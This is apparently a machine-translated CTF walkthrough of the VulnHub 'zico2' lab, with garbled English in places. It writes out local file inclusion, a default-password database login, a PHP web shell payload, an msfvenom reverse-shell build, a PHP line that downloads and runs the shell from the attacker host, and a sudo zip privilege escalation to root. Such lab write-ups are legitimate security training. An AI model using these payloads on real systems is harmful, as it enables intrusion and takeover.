**
VulnHub-zico2: 1-Walkthrough
**
Drone address: https: //www.vulnhub.com/entry/zico2-1,210/
drone Difficulty: Intermediate (CTF)
drone Release Date: June 19, 2017
drone Description:
Zico trying to build their own websites, but we had some trouble in the choice of CMS to use. After tried some popular methods, he decided to build his own way. That's a good idea?
Tip: enumeration, enumeration and the enumeration!
Goal: to get root access & find flag.txt
Author: Dayu
Time: 2020-01-23
Note: For all these computers, I've downloaded using a computer running VMware. I will use Kali Linux as a solution to the attacker's machine the CTF. Here the use of technology for learning for educational purposes only, if the technology is listed for any other goal, I will not be responsible.
First, information collection
We need to identify targets in the VM's IP address, use nmap to obtain the destination IP address:
We've found the CTF target computer IP address: 192.168.56.128
nmap port scan to 22,80,111,50702 is on ...
the detection Web port:
turned down ...
click to enter ...
you can see tools.html page URL ... could be vulnerable to LFI's try ...
try to get LFI and successfully use / ... / ... / etc / passwd ... found here zico user ...
earlier prompted us to enumerate, I'll enumerate blasting a look at ...
/ dbadmin / browse the directory found test_db.php file ... access to it
can see a php database login page and the version name ...
use the default password admin successfully logged in ...
can be seen here present, I found there are three ways you can provide the right to ...
file upload ... LFI injection ... write shell inserted in the page ...
after a review of the steps can be carried out in accordance with ...
command:? <php echo system ( $ _GET [ "cmd"]) ;?>
you can see php code script has been saved in the database ...
Second, the right to mention
Execute the file ... here you can see www-data located in ...
here the idea is very simple, first create a shell on the local ...
Command: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.56.103 lport=4444 -f elf > shell
open msf, but unfortunately I do not know why it is simple to upload a shell up, open can get permission, but it is not life and death, I can only help MSF put this drone scored first, or else mentality exploded ...
command: <?php system("cd /tmp;wget http://192.168.56.103:8000/shell;chmod +x shell;./shell");?>
under revisit to ...
here ... here successfully obtained permission to enter zico after users find the wordpress directory, go in there must be a wp-config.php file you can view the account password ... common sense
sWfCsfJSPV9H3AmQzw8
SSH successful landing ...
command: sudo zip /tmp/nisha.zip /home/zico/raj -T --unzip-command="sh -c /bin/bash"
you can see tar and zip user can run commands as root, without entering any password ...
will file raj compressed file, and then move to /tmp/nisha.zip folder, then unzip it, then pop root shell ...
Successful root privileges and found flag.txt ...
Since we have been successful root privileges & find flag.txt, thus completing the simple drone, I hope you like this machine, please continue to focus on large there will be late more challenging than the machine, along with exercises to learn.
If you have other methods of welcome message. If there wrong place, you must tell me. If you find this blog to write good, welcome to share the people around.